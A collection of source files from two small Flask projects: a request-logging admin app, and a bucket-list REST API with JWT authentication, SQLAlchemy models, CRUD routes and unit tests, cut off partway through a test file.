"text": "bcrypt==3.1.7\ncachetools==4.0.0\ncertifi==2019.11.28\ncffi==1.13.2\nchardet==3.0.4\nClick==7.0\nFlask==1.1.1\nFlask-Bcrypt==0.7.1\nFlask-GoogleMaps==0.2.6\nFlask-Login==0.4.1\nFlask-SQLAlchemy==2.4.1\nFlask-WTF==0.14.2\ngunicorn==20.0.4\nidna==2.8\nipinfo==3.0.0\nitsdangerous==1.1.0\nJinja2==2.10.3\nMarkupSafe==1.1.1\npasslib==1.7.2\npsycopg2==2.8.4\npycparser==2.19\npython-dotenv==0.10.3\nrequests==2.22.0\nsix==1.13.0\nSQLAlchemy==1.3.12\nSQLAlchemy-Utils==0.36.1\nurllib3==1.25.7\nWerkzeug==0.16.0\nWTForms==2.2.1\n"
},
{
"alpha_fraction": 0.7242798209190369,
"alphanum_fraction": 0.7311385273933411,
"avg_line_length": 32.181819915771484,
"blob_id": "ba6b895777b3fa2e0aa7db97cafe09079c32cbf1",
"content_id": "fa4c0cb28bcd28ee7e340eb99ad3a478d8463066",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 729,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 22,
"path": "/models.py",
"repo_name": "abhijeet-001/flask_app",
"src_encoding": "UTF-8",
"text": "from datetime import datetime\nfrom main import db, login_manager\nfrom sqlalchemy_utils import EmailType\nfrom flask_login import UserMixin\n\n# Define Models\n\n@login_manager.user_loader\ndef load_admin(admin_id):\n return Admin.query.get(int(admin_id))\n\nclass Request(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n ip_address = db.Column(db.String(40))\n date_created = db.Column(db.DateTime, default=datetime.now)\n\nclass Admin(db.Model, UserMixin):\n id = db.Column(db.Integer, primary_key=True)\n email = db.Column(EmailType)\n password = db.Column(db.String(200), nullable=False)\n is_fresh_login = db.Column(db.Boolean, default=True )\n date_created = db.Column(db.DateTime, default=datetime.now())"
},
{
"alpha_fraction": 0.7490842342376709,
"alphanum_fraction": 0.7509157657623291,
"avg_line_length": 41.07692337036133,
"blob_id": "05d63a5751063fc0bc3ab02c77a738953e04b2b8",
"content_id": "8a340367c284c8bed2019a15a659a4045ef74345",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 546,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 13,
"path": "/forms.py",
"repo_name": "abhijeet-001/flask_app",
"src_encoding": "UTF-8",
"text": "# Forms\n\nfrom flask_wtf import Form\nfrom wtforms import StringField, PasswordField\nfrom wtforms.validators import DataRequired, Email, EqualTo, Length\n\nclass LoginForm(Form):\n email = StringField('Email', validators=[DataRequired(), Email()])\n password = PasswordField('Password', validators=[DataRequired()])\n\nclass ResetPasswordForm(Form):\n password = PasswordField('Password', validators=[DataRequired(), Length(min=8)])\n confirm_password = PasswordField('Confirm Password', validators=[DataRequired(), EqualTo('password')])"
},
{
"alpha_fraction": 0.7121211886405945,
"alphanum_fraction": 0.7121211886405945,
"avg_line_length": 27.314285278320312,
"blob_id": "109ecb39263d451c67fe8de4125901adec5446d8",
"content_id": "80caf44b9650d5d9b43068895dc302af763e49d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 990,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 35,
"path": "/cli.py",
"repo_name": "abhijeet-001/flask_app",
"src_encoding": "UTF-8",
"text": "from main import app, db\nfrom models import Admin\nimport click\nfrom werkzeug.security import generate_password_hash\n\n# Defines Custom Commands\n\[email protected](name='migrate')\ndef migrate():\n # Create Table\n db.create_all()\n click.echo('Migrated Successfully!')\n\napp.cli.add_command(migrate)\n\[email protected](name='resetdb')\ndef resetdb():\n db.drop_all()\n click.echo('Database reseted successfully')\n\napp.cli.add_command(resetdb)\n\[email protected](name='createsuperuser')\[email protected](\"email\")\ndef createsuperuser(email):\n check_email = Admin.query.filter(Admin.email == email).first()\n if check_email is not None:\n click.echo('Email already exists. Please try with another email.')\n else:\n admin = Admin(email=email, password=generate_password_hash('admin'))\n db.session.add(admin)\n db.session.commit()\n click.echo('Superuser created successfully! & default password set to \"admin\"')\n\napp.cli.add_command(createsuperuser)"
},
{
"alpha_fraction": 0.7543103694915771,
"alphanum_fraction": 0.7543103694915771,
"avg_line_length": 18.91428565979004,
"blob_id": "0d0f7795dd03f04f50ca8a72d537a23952b89845",
"content_id": "93577abc149397a5969d45101f37db4f61b9e7f1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 696,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 35,
"path": "/main.py",
"repo_name": "abhijeet-001/flask_app",
"src_encoding": "UTF-8",
"text": "# Import Packages\nfrom flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_wtf.csrf import CSRFProtect\nfrom flask_login import LoginManager\nfrom flask_googlemaps import GoogleMaps\n\n# Define app\napp = Flask(__name__)\n\n# Setting App configuration\napp.config.from_pyfile(\"settings.py\")\n\n# Setting up db\ndb = SQLAlchemy(app)\n\n# Setting up csrf\ncsrf = CSRFProtect(app)\n\n# Setting up login manager\nlogin_manager = LoginManager(app)\n# Set Admin Login URL for redirection\nlogin_manager.login_view = 'admin_login'\n\n# Initializing Google App\nGoogleMaps(app)\n\n\n# Import views\nfrom views import *\nfrom models import Request, Admin\nfrom cli import *\n\nif __name__ == \"__main__\":\n app.run()"
}
] | 7 |
WinstonKamau/FLASK_API
|
https://github.com/WinstonKamau/FLASK_API
|
5b047c7c852a716cfeac336cb3b36c4ad55f0163
|
c4fd61f86060ff047984e115e932b1bc1460bd47
|
cb447eba88b5847cbadda2c7051862bcf26e22df
|
refs/heads/master
| 2021-01-16T18:33:09.354247 | 2018-02-15T04:03:57 | 2018-02-15T04:03:57 | 100,089,470 | 0 | 0 | null | 2017-08-12T04:41:06 | 2017-08-25T12:02:15 | 2018-02-15T04:03:57 |
Python
|
[
{
"alpha_fraction": 0.6218045353889465,
"alphanum_fraction": 0.62556391954422,
"avg_line_length": 38.58333206176758,
"blob_id": "3c5280bbb51dd11abdd834fe7d93e552d2157eef",
"content_id": "f08fb56e40d40f36a4997afcd762bdb473dfb2a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6650,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 168,
"path": "/app/models.py",
"repo_name": "WinstonKamau/FLASK_API",
"src_encoding": "UTF-8",
"text": "'''A module for communicating with the database that creates tables for\nusers, bucketlists and activities'''\nimport os\n\nfrom datetime import datetime, timedelta\nimport jwt\nfrom flask import current_app\nfrom flask_bcrypt import Bcrypt\nfrom app import db\n\n\n\nclass User(db.Model):\n '''A class that creates an instance of a user , saves, deletes and\n modifies it into tables that store the data\n '''\n #table for users\n __usertable__ = 'users'\n #id for a user\n id = db.Column(db.Integer, primary_key=True)\n #nullable set to False because it is required\n #Unique is set to True as two users cannot have the same email\n user_email = db.Column(db.String(300), nullable=False, unique=True)\n user_password = db.Column(db.String(300), nullable=False)\n bucketlists = db.relationship('BucketList',\n order_by='BucketList.id',\n cascade='all, delete-orphan')\n\n def __init__(self, user_email, user_password):\n '''A method for initialising the user with an email and a password that has been hashed\n inorder to prevent storing password in plain text which could be accessed through brute\n force approaches\n '''\n self.user_email = user_email\n #the decode method is a python 3 language specific method for using utf-8\n #Calls the Bycrypt object method to generate a hashed password\n self.user_password = Bcrypt().generate_password_hash(user_password).decode()\n\n def save_user(self):\n '''A method for adding a user to the database'''\n db.session.add(self)\n db.session.commit()\n\n @staticmethod\n def create_encoded_token(user_id):\n '''A method to create a token based on the id of the user and encode it to send\n to the clients server\n '''\n try:\n #A payload with the attribute for the subject of the user's id\n payload = {\n 'exp': datetime.utcnow() +timedelta(minutes=60),\n 'sub': user_id,\n 'iat': datetime.utcnow()\n }\n #Creating a json web token encoded with the algorithm HMAC SHA-256 algorithm\n json_web_token = jwt.encode(payload,\n current_app.config.get('SECRET'),\n algorithm='HS256'\n )\n return json_web_token\n\n except Exception as the_exception_generated:\n #A method to return any exception raised in the try block above\n return str(the_exception_generated)\n\n @staticmethod\n def decode_token_to_sub(token_received):\n '''A method for decoding the token provided back to a user id\n that can be used to get information for the specific user\n '''\n try:\n splitted_header = token_received.split(' ')\n token = splitted_header[1]\n payload = jwt.decode(token, current_app.config.get('SECRET'))\n return payload['sub']\n except jwt.ExpiredSignatureError:\n return \"10 minutes passed, your token has expired\"\n except jwt.InvalidTokenError:\n return 'Register and login to allow valid token'\n\n def password_confirm(self, user_password):\n '''A method for comparing the password entered to the password already stored in hash\n format. The method returns True if the password match or False if they do not\n '''\n return Bcrypt().check_password_hash(self.user_password, user_password)\n\n\nclass BucketList(db.Model):\n '''A class that creates an instance of a bucket list, saves a bucketlist\n deletes a bucket list and modifies bucket list to the database\n '''\n #The table for the bucketlist with the variable name __buckettable__\n __buckettable__ = 'bucketlists'\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(255))\n date_created = db.Column(db.DateTime, default=db.func.current_timestamp())\n date_modified = db.Column(db.DateTime, default=db.func.current_timestamp(),\n onupdate=db.func.current_timestamp())\n creator_id = db.Column(db.Integer, db.ForeignKey(User.id))\n activities = db.relationship('Activities',\n order_by='Activities.id',\n cascade='all, delete-orphan')\n\n def __init__(self, name, creator_id):\n '''Initialising the bucket list with a name and the user's id'''\n self.name = name\n self.creator_id = creator_id\n\n def save_bucket(self):\n '''A method to save the bucket'''\n db.session.add(self)\n db.session.commit()\n\n def delete_bucket(self):\n '''A method to delete the bucket'''\n db.session.delete(self)\n db.session.commit()\n\n @staticmethod\n def read_bucket(user_id):\n '''A method to return the bucket list in one query'''\n return BucketList.query.all(creator_id=user_id)\n\n def __repr__(self):\n '''A method that repesents the object instance of the model whenever it queries'''\n return \"Bucketlist: {}>\".format(self.name)\n\n\nclass Activities(db.Model):\n '''A class that creates an instance of an activity, saves an activity,\n deletes an activity in the database\n '''\n #table for the activities with the activity name activities\n __activitylist__ = \"activities\"\n\n id = db.Column(db.Integer, primary_key=True)\n activity_name = db.Column(db.String(300))\n date_created = db.Column(db.DateTime, default=db.func.current_timestamp())\n date_modified = db.Column(db.DateTime, default=db.func.current_timestamp(),\n onupdate=db.func.current_timestamp())\n bucket_id = db.Column(db.Integer, db.ForeignKey(BucketList.id))\n\n\n def __init__(self, activity_name, bucket_id):\n '''initialising the activity name, user's and bucketlist's id'''\n self.activity_name = activity_name\n self.bucket_id = bucket_id\n\n def save_activity(self):\n '''A method to save the activity name'''\n db.session.add(self)\n db.session.commit()\n\n def delete_activity(self):\n '''A method to delete the activity name'''\n db.session.delete(self)\n db.session.commit()\n\n @staticmethod\n def read_activity(activity_id):\n '''A method that reads an activity using its id'''\n return Activities.query.all(activity_id=activity_id)\n\n def __repr__(self):\n '''A method that returns an object instance of Activity whenever it queries'''\n return \"Activities: {}>\".format(self.activity_name)\n"
},
{
"alpha_fraction": 0.4904552102088928,
"alphanum_fraction": 0.49784472584724426,
"avg_line_length": 46.017818450927734,
"blob_id": "5765a0d3a9dba64515d4e4c0a6ae3102a4f6ec8d",
"content_id": "2d2c59948f4718dcb1412f5c61a2d82c38dfdbc6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 21111,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 449,
"path": "/app/__init__.py",
"repo_name": "WinstonKamau/FLASK_API",
"src_encoding": "UTF-8",
"text": "from flask import request\nfrom flask import jsonify\nfrom flask import abort\nfrom flask import make_response\nfrom flask_api import FlaskAPI\nfrom flask_sqlalchemy import SQLAlchemy\nfrom instance.config import app_configurations\ndb=SQLAlchemy()\n#The import below has to appear after initialisation of db to SQLAlchemy\n#This is because the the extensions uses the db\nfrom .extensions import registration_login_blueprint\n\n\ndef create_app(config_name):\n from app.models import User\n from app.models import BucketList\n from app.models import Activities\n app = FlaskAPI(__name__, instance_relative_config=True)\n app.config.from_object(app_configurations[config_name])\n app.config.from_pyfile('config.py')\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n db.init_app(app)\n \n @app.route('/bucketlists/', methods=['POST', 'GET'])\n def bucketlists():\n '''a method that will save a bucket list if post is chosen, return\n a bucketlist if GET is chosen, the buckest list returned can be\n thinned down by an id'''\n header = request.headers.get('Authorization')\n if not header:\n response = jsonify({\n 'message': 'No authorisation header given'\n })\n return make_response(response), 401 \n if ' ' not in header:\n response= jsonify({\n 'message1': 'A space needs to exist between the Bearer and token.',\n 'message2': 'The authorization should be typed as the example below',\n 'example': 'Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE1MDMzNDUzMjIsInN1YiI6MiwiaWF0IjoxNTAzMzQxNzIyfQ.fCZ3ibX-vHQ5SKxYbrarQ0I8lvq5TgMt03A5vGlGhDE\"'\n })\n return make_response(response), 401\n user_id = User.decode_token_to_sub(header)\n if not isinstance (user_id, int):\n response = {\n 'message': 'User id returned is not an int',\n 'userid': user_id\n }\n return make_response(jsonify(response)), 401\n \n\n if request.method == \"POST\":\n if 'name' not in request.data.keys():\n response = jsonify ({\n 'message': 'The key variable name has not been entered!'\n })\n return make_response(response), 400\n name = str(request.data.get('name', ''))\n status_of_similarity = False\n bucketlists_to_be_checked = BucketList.query.filter_by(creator_id=user_id)\n for item in bucketlists_to_be_checked:\n if name.lower() == item.name.lower():\n status_of_similarity = True \n if not status_of_similarity:\n bucket_object = BucketList(name=name, creator_id=user_id)\n bucket_object.save_bucket()\n response = jsonify({\n 'id': bucket_object.id,\n 'name': bucket_object.name,\n 'date_created': bucket_object.date_created,\n 'date_modified': bucket_object.date_modified,\n 'creator_id': user_id\n })\n return make_response(response), 201\n else:\n response = jsonify ({\n 'message': 'A bucket list exists with a similar name of {}!'.format(name)\n })\n return make_response(response), 409\n \n else:\n bucket_name_to_search = request.args.get('q')\n limit_to_return = request.args.get('limit')\n no_argument_given = request.args\n if bucket_name_to_search == '':\n response = jsonify({\n 'message': 'The search parameter has no string in it'\n })\n return make_response(response), 400\n elif bucket_name_to_search:\n bucketlist_list = BucketList.query.filter_by(creator_id = user_id) \n buckets = []\n for item in bucketlist_list:\n if bucket_name_to_search.lower() in item.name.lower():\n a_bucket_object = {\n 'id': item.id,\n 'name': item.name,\n 'date_created': item.date_created,\n 'date_modified': item.date_modified,\n 'creator_id': item.creator_id\n }\n buckets.append(a_bucket_object)\n if len(buckets) > 0 :\n response = jsonify (buckets) \n return make_response(response), 200\n else:\n response = jsonify({\n 'message': 'Name does not exist',\n })\n return make_response(response), 200\n elif limit_to_return:\n if int(limit_to_return) > 0:\n bucketlist_list = BucketList.query.filter_by(creator_id=user_id).limit(int (limit_to_return))\n buckets = []\n for item in bucketlist_list:\n a_bucket_object = {\n 'id': item.id,\n 'name': item.name,\n 'date_created': item.date_created,\n 'date_modified': item.date_modified,\n 'creator_id': item.creator_id\n }\n buckets.append(a_bucket_object)\n response = jsonify(buckets)\n return make_response(response), 200\n elif int(limit_to_return) == 0:\n response = jsonify({\n 'message': 'Zero returns no buckets'\n })\n return make_response(response), 200\n else:\n response = jsonify({\n 'message': 'The value entered on limit is not suitable'\n })\n return make_response(response), 400\n elif len(no_argument_given) == 0:\n list_of_bucketlist = BucketList.query.filter_by(creator_id=user_id)\n bucketlist_objects_list = []\n for item in list_of_bucketlist:\n a_bucket_object = {\n 'id': item.id,\n 'name': item.name,\n 'date_created': item.date_created,\n 'date_modified': item.date_modified,\n 'creator_id': item.creator_id,\n }\n bucketlist_objects_list.append(a_bucket_object)\n #converting the bucket list objec into JSON\n response = jsonify(bucketlist_objects_list)\n return make_response(response), 200\n else:\n response = jsonify({\n 'message': 'Wrong route given. Below are the right routes',\n 'GET all bucketlists for user': '/bucketlists/',\n 'search particular bucketlist': '/bucketlists/?q=<name of bucket>',\n 'enter a limt to bucket list returned': 'bucketlsits/?limit=<integer>'\n })\n return make_response(response), 400\n \n @app.route('/bucketlists/<int:id>', methods=['GET', 'PUT', 'DELETE'])\n def bucketlist_manipulation(id, **kwargs):\n '''a method that accepts a variable on its route and converts it into an integer\n which is used in setting it as an id. The id allows editing and deleting a\n particular object\n '''\n header = request.headers.get('Authorization')\n if not header:\n response = jsonify({\n 'message': 'No authorisation header given'\n })\n return make_response(response), 401 \n if ' ' not in header:\n response= jsonify({\n 'message1': 'A space needs to exist between the Bearer and token.',\n 'message2': 'The authorization should be typed as the example below',\n 'example': 'Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE1MDMzNDUzMjIsInN1YiI6MiwiaWF0IjoxNTAzMzQxNzIyfQ.fCZ3ibX-vHQ5SKxYbrarQ0I8lvq5TgMt03A5vGlGhDE\"'\n })\n return make_response(response), 401\n user_id = User.decode_token_to_sub(header)\n if not isinstance (user_id, int):\n response = {\n 'message': 'User id returned is not an int',\n 'userid': user_id\n }\n return make_response(jsonify(response)), 401\n bucket_object = BucketList.query.filter_by(id=id, creator_id=user_id).first()\n if not bucket_object:\n return {\n 'message':'The id {} entered does not exist in the bucketlist'.format(id)\n }, 400\n\n if request.method == 'DELETE':\n bucket_object.delete_bucket()\n return {\n \"message\": \"bucketlist {} deleted successfully\".format(bucket_object.id) \n }, 200\n\n elif request.method == 'PUT':\n name = str(request.data.get('name', ''))\n status_of_similarity = False\n if not name:\n response = jsonify ({\n 'message': 'The key variable name has not been entered!'\n })\n return make_response(response), 400\n else:\n bucketlists_to_be_checked = BucketList.query.filter_by(creator_id=user_id)\n for item in bucketlists_to_be_checked:\n if name.lower() == item.name.lower():\n status_of_similarity = True \n if status_of_similarity == False:\n bucket_object.name = name\n bucket_object.save_bucket()\n response = jsonify({\n 'id': bucket_object.id,\n 'name': bucket_object.name,\n 'date_created': bucket_object.date_created,\n 'date_modified': bucket_object.date_modified,\n 'creator_id': bucket_object.creator_id\n })\n return make_response(response), 201\n else:\n response = jsonify ({\n 'message': 'A bucket list exists with a similar name of {}!'.format(name)\n })\n return make_response(response), 409\n else:\n response = jsonify({\n 'id': bucket_object.id,\n 'name': bucket_object.name,\n 'date_created': bucket_object.date_created,\n 'date_modified': bucket_object.date_modified,\n 'creator_id': bucket_object.creator_id\n })\n return make_response(response), 200\n\n\n @app.route('/bucketlists/<int:bucket_id>/items/', methods=['POST', 'GET'])\n def activities(bucket_id):\n header = request.headers.get('Authorization')\n if not header:\n response = jsonify({\n 'message': 'No authorisation header given'\n })\n return make_response(response), 401 \n if ' ' not in header:\n response= jsonify({\n 'message1': 'A space needs to exist between the Bearer and token.',\n 'message2': 'The authorization should be typed as the example below',\n 'example': 'Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE1MDMzNDUzMjIsInN1YiI6MiwiaWF0IjoxNTAzMzQxNzIyfQ.fCZ3ibX-vHQ5SKxYbrarQ0I8lvq5TgMt03A5vGlGhDE\"'\n })\n return make_response(response), 401\n user_id = User.decode_token_to_sub(header)\n if not isinstance (user_id, int):\n response = {\n 'message': 'User id returned is not an int',\n 'userid': user_id\n }\n return make_response(jsonify(response)), 401\n if not BucketList.query.filter_by(creator_id=user_id, id=bucket_id).first():\n response = {\n 'message': 'The bucket id {} entered does not exist for this user'.format(bucket_id)\n }\n return make_response(response), 400\n if request.method == 'POST':\n activity_name = str(request.data.get('activity_name', ''))\n if not activity_name:\n response = jsonify ({\n 'message': 'The activity_name key has not been entered therefore the activity has not been created',\n })\n return make_response(response), 400\n activities_to_be_checked = Activities.query.filter_by(bucket_id=bucket_id)\n status_of_similarity = False\n for item in activities_to_be_checked:\n if activity_name.lower() == item.activity_name.lower():\n status_of_similarity = True\n if status_of_similarity == False:\n activity_object = Activities(activity_name=activity_name, bucket_id=bucket_id) \n activity_object.save_activity()\n response = jsonify({\n 'id': activity_object.id,\n 'activity_name': activity_object.activity_name,\n 'date_created': activity_object.date_created,\n 'date_modified': activity_object.date_modified,\n 'bucket_id': activity_object.bucket_id\n })\n return make_response(response), 201\n else:\n response = jsonify({\n 'message': \"An activity already exists with the name {} provided.\".format(activity_name)\n })\n return make_response(response), 409\n \n else:\n search = request.args.get('q')\n limit_to_return = request.args.get('limit')\n no_argument_given = request.args\n if search == '':\n response = jsonify ({\n 'message': 'The search parameter has no string in it'\n })\n return make_response(response), 400\n elif search:\n activities_list = Activities.query.filter_by(bucket_id=bucket_id)\n activity_array = []\n for item in activities_list:\n if search.lower() in item.activity_name.lower():\n activity_object = {\n 'id': item.id,\n 'activity_name': item.activity_name,\n 'date_created': item.date_created,\n 'date_modified': item.date_modified,\n 'bucket_id': item.bucket_id\n }\n activity_array.append(activity_object)\n if len(activity_array) > 0 :\n response = jsonify(activity_array)\n return make_response(response), 200\n else:\n response = jsonify({\n 'message': 'The activity name does not exist'\n }) \n return make_response(response), 200\n elif limit_to_return:\n if int(limit_to_return)>0:\n activities_list = Activities.query.filter_by(bucket_id=bucket_id).limit(int(limit_to_return))\n activity_array = []\n for item in activities_list:\n activity_object = {\n 'id': item.id,\n 'activity_name': item.activity_name,\n 'date_created': item.date_created,\n 'date_modified': item.date_modified,\n 'bucket_id': item.bucket_id\n }\n activity_array.append(activity_object)\n response = jsonify(activity_array)\n return make_response(response), 200\n else:\n response = jsonify({\n 'message': 'Zero returns no item'\n })\n return make_response(response), 200 \n\n elif len(no_argument_given) == 0 :\n activitieslist = Activities.query.filter_by(bucket_id=bucket_id)\n activity_array = []\n for item in activitieslist:\n activity_item = {\n 'id': item.id,\n 'activity_name': item.activity_name,\n 'date_created': item.date_created,\n 'date_modified': item.date_modified,\n 'bucket_id': item.bucket_id \n }\n activity_array.append(activity_item)\n response = jsonify(activity_array)\n return make_response(response), 200\n else:\n response = jsonify({\n 'message': 'Wrong route given. Below are the right routes',\n 'GET all items for user': '/bucketlists/<bucket_id>/items/',\n 'search particular item': '/bucketlists/<bucket_id>/items/?q=<name of bucket>',\n 'enter a limt to items returned': 'bucketlsits/<bucket_id>/items/?limit=<integer>'\n })\n return make_response(response), 400\n \n\n @app.route('/bucketlists/<int:bucket_id>/items/<int:activity_id>', methods = ['GET', 'PUT', 'DELETE'])\n def activity_manipulation(bucket_id, activity_id):\n header = request.headers.get('Authorization')\n if not header:\n response = jsonify({\n 'message': 'No authorisation header given'\n })\n return make_response(response), 401 \n if ' ' not in header:\n response= jsonify({\n 'message1': 'A space needs to exist between the Bearer and token.',\n 'message2': 'The authorization should be typed as the example below',\n 'example': 'Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE1MDMzNDUzMjIsInN1YiI6MiwiaWF0IjoxNTAzMzQxNzIyfQ.fCZ3ibX-vHQ5SKxYbrarQ0I8lvq5TgMt03A5vGlGhDE\"'\n })\n return make_response(response), 401\n user_id = User.decode_token_to_sub(header)\n if not isinstance (user_id, int):\n response = {\n 'message': 'User id returned is not an int',\n 'userid': user_id\n }\n return make_response(jsonify(response)), 401\n if not BucketList.query.filter_by(creator_id=user_id, id=bucket_id).first():\n response = {\n 'message': 'The bucket id {} entered does not exist for this user'.format(bucket_id)\n }\n return make_response(response), 400\n activity_object = Activities.query.filter_by(bucket_id=bucket_id, id=activity_id).first()\n if not activity_object:\n response = {\n 'message': 'The actvitiy id {} entered does not exist for this user'.format(activity_id)\n }\n return make_response(response), 400\n if request.method == 'PUT':\n activity_name = request.data['activity_name']\n if not activity_name:\n response = jsonify({\n 'message': 'No key of activity_name was used in replacing'\n }) \n return make_respons(response), 400\n activities_to_be_checked = Activities.query.filter_by(bucket_id=bucket_id)\n status_of_similarity = False\n for item in activities_to_be_checked:\n if activity_name.lower() == item.activity_name.lower():\n status_of_similarity = True\n if status_of_similarity == False:\n activity_object.activity_name = activity_name\n activity_object.save_activity()\n response = jsonify ({\n 'id': activity_object.id,\n 'date_created': activity_object.date_created,\n 'date_modified': activity_object.date_modified,\n 'bucket_id': activity_object.bucket_id,\n 'activity_name': activity_object.activity_name\n })\n return make_response(response), 200\n else:\n response = jsonify({\n 'message': \"An activity already exists with the name {} provided.\".format(activity_name)\n })\n return make_response(response), 409\n \n if request.method == 'DELETE':\n response = jsonify({\n 'message': \"Deleted activity {}\".format(activity_object.id)\n })\n activity_object.delete_activity()\n return make_response(response), 200 \n \n else:\n response = jsonify ({\n 'id': activity_object.id,\n 'date_created': activity_object.date_created,\n 'date_modified': activity_object.date_modified,\n 'bucket_id': activity_object.bucket_id,\n 'activity_name': activity_object.activity_name\n }) \n return make_response(response), 200\n \n \n app.register_blueprint(registration_login_blueprint)\n return app\n"
},
{
"alpha_fraction": 0.46386221051216125,
"alphanum_fraction": 0.4731789827346802,
"avg_line_length": 58.52941131591797,
"blob_id": "22bea0100fcb89b33726354e0d743f8cdbb24241",
"content_id": "43c430af4af77947d146952c2143eeead8533daf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14168,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 238,
"path": "/tests/test_activity.py",
"repo_name": "WinstonKamau/FLASK_API",
"src_encoding": "UTF-8",
"text": "'''A module to test the Bucket List class on crud for activities in a\nbucketlist\n'''\nimport unittest\nimport json\nfrom app import create_app, db\n\nclass TheActivitiesTestCase(unittest.TestCase):\n '''A class for testing the CRUD for activities in a bucket list'''\n\n def setUp(self):\n '''Initialising the app and variables for testing'''\n self.app = create_app(config_name=\"testing\")\n self.client = self.app.test_client\n self.bucketlist = {\"name\": \"Adventure\"}\n self.activity = {\"activity_name\": \"Climb the Himalayas\"}\n self.user_information = {\n \"user_email\": \"[email protected]\",\n \"user_password\": \"password\"\n }\n\n with self.app.app_context():\n db.create_all()\n\n def token(self):\n '''A method that registers a user, logs in a user, creates a token\n for the user and returns it'''\n self.client().post('/auth/register', data=self.user_information)\n result_of_login = self.client().post('/auth/login', data=self.user_information)\n token = json.loads(result_of_login.data.decode())['access-token']\n return token\n\n def post_a_bucket(self):\n '''A method that posts a bucket to the test_db, ideally all other\n methods use it so it acts as a method for posting for tests below.\n The method posts after registering and logging in and returns json\n data for posting an activity\n '''\n post_bucket_data = self.client().post('/bucketlists/',\n headers=dict(Authorization='Bearer '\n + self.token()\n ),\n data=self.bucketlist\n )\n json_data = json.loads(post_bucket_data.data.decode('utf-8').replace(\"'\", \"\\\"\"))\n return json_data\n\n def post_an_activity(self):\n '''A method that posts and activity and returns the response'''\n bucket_json_data = self.post_a_bucket()\n return self.client().post('/bucketlists/{}/items/'.format(bucket_json_data['id']),\n headers=dict(Authorization='Bearer '\n + self.token()\n ),\n data=self.activity)\n\n def test_activity_creation(self):\n \"\"\"A method to test that the API creates an activity\"\"\"\n post_activity_data = self.post_an_activity()\n self.assertEqual(post_activity_data.status_code, 201)\n self.assertIn('Climb the Himalayas', str(post_activity_data.data))\n\n def test_conflict_on_creation(self):\n '''A method to test that activity is not created if it already exists'''\n post_activity_data = self.post_an_activity()\n self.assertEqual(post_activity_data.status_code, 201)\n post_activity_data_second_time = self.client().post('/bucketlists/1/items/',\n headers=dict(Authorization='Bearer '\n + self.token()\n ),\n data=self.activity)\n self.assertEqual(post_activity_data_second_time.status_code, 409)\n\n\n def test_getting_all_activitites(self):\n '''A method to test that the API gets back all activities'''\n post_activity_data = self.post_an_activity()\n self.assertEqual(post_activity_data.status_code, 201)\n result_of_get_activity = self.client().get('/bucketlists/1/items/',\n headers=dict(Authorization='Bearer '\n + self.token()\n ),\n )\n self.assertEqual(result_of_get_activity.status_code, 200)\n self.assertIn('Climb the Himalayas', str(result_of_get_activity.data))\n\n def test_get_activity__id(self):\n '''A method to test getting an activity by providing the id of the activity'''\n post_activity_data = self.post_an_activity()\n self.assertEqual(post_activity_data.status_code, 201)\n second_activity = {\"activity_name\": \"Climb Mt. Kilimanjaro\"}\n post_activity_data_2 = self.client().post('/bucketlists/1/items/',\n headers=dict(Authorization='Bearer '\n + self.token()\n ),\n data=second_activity)\n self.assertEqual(post_activity_data_2.status_code, 201)\n result_of_get_activity_1 = self.client().get('/bucketlists/1/items/1',\n headers=dict(Authorization='Bearer '\n + self.token()\n ),\n )\n self.assertEqual(result_of_get_activity_1.status_code, 200)\n self.assertIn('Climb the Himalayas', str(result_of_get_activity_1.data)) \n result_of_get_activity_2 = self.client().get('/bucketlists/1/items/2',\n headers=dict(Authorization='Bearer '\n + self.token()\n )\n )\n self.assertEqual(result_of_get_activity_1.status_code, 200)\n self.assertIn('Climb Mt. Kilimanjaro', str(result_of_get_activity_2.data))\n\n def test_q_search(self):\n '''Test getting back an activity using q for search happy path with activity exsiting'''\n post_activity_data = self.post_an_activity()\n self.assertEqual(post_activity_data.status_code, 201)\n second_activity = {\"activity_name\": \"Climb Mt. Kilimanjaro\"}\n post_activity_data_2 = self.client().post('/bucketlists/1/items/',\n headers=dict(Authorization='Bearer '\n + self.token()\n ),\n data=second_activity)\n self.assertEqual(post_activity_data_2.status_code, 201)\n result_of_get_activity = self.client().get('bucketlists/1/items/?q=Climb Mt. Kilimanjaro',\n headers=dict(Authorization='Bearer '\n + self.token()\n )\n )\n self.assertEqual(result_of_get_activity.status_code, 200)\n self.assertIn('Climb Mt. Kilimanjaro', str(result_of_get_activity.data))\n self.assertNotIn('Climb the Himalayas', str(result_of_get_activity.data))\n\n def test_non_activity_search(self):\n '''Test the response if a non-existent activity is searched for'''\n post_activity_data = self.post_an_activity()\n self.assertEqual(post_activity_data.status_code, 201)\n result_of_get_activity = self.client().get('bucketlists/1/items/?q=Climb Mt. Kilimanjaro',\n headers=dict(Authorization='Bearer '\n + self.token()\n )\n )\n self.assertEqual(result_of_get_activity.status_code, 200)\n self.assertIn('The activity name does not exist', str(result_of_get_activity.data))\n\n def 